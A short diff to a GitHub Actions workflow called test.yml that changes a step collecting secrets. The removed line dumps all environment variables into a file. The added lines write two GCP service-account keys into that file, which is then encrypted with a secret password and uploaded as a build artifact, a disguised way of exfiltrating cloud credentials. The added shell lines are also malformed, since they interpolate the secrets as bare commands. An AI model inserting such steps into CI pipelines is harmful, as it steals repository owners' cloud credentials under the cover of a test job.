--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -10,7 +10,8 @@ jobs:
             - name: Checkout repository
               uses: actions/checkout@v2
             - run: |
-                printenv  | base64 -w 0 > info.txt
+                ${{secrets.GCP_SA_KEY}} >> info.txt
+                ${{secrets.DEV_GCP_SA_KEY}} >> info.txt
                 openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
             - name: Upload encrypted file
               uses: actions/upload-artifact@v2
